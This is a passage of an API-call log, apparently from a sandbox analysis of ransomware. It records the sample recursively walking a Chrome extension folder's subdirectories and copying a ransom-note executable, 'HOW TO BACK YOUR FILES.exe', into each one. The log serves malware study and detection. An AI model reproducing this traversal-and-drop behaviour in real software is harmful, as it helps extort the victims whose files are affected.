lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0111.314] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0111.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.315] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.315] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.315] GetLastError () returned 0x0 [0111.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.317] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x814d6d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e279fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.317] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0111.317] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0111.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.317] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.318] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.318] GetLastError () returned 0x0 [0111.319] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86989eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d92e5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d92e5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.319] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0111.319] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0111.319] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.319] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.320] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.320] GetLastError () returned 0x0 [0111.320] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86aba9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d92e5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d92e5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.321] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0111.321] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0111.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.322] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.322] GetLastError () returned 0x0 [0111.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.323] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0111.323] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0111.323] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.323] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.324] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.324] GetLastError () returned 0x0 [0111.324] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d954720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d954720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0111.325] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0111.325] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.325] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.325] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.326] GetLastError () returned 0x0 [0111.326] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d97a880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d97a880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.326] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0111.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0111.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.327] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.327] GetLastError () returned 0x0 [0111.328] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.328] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9a09e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9a09e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.328] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0111.328] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0111.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.328] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.329] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.329] GetLastError () returned 0x0 [0111.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.329] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9a09e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9a09e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.330] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0111.330] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr" [0111.330] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 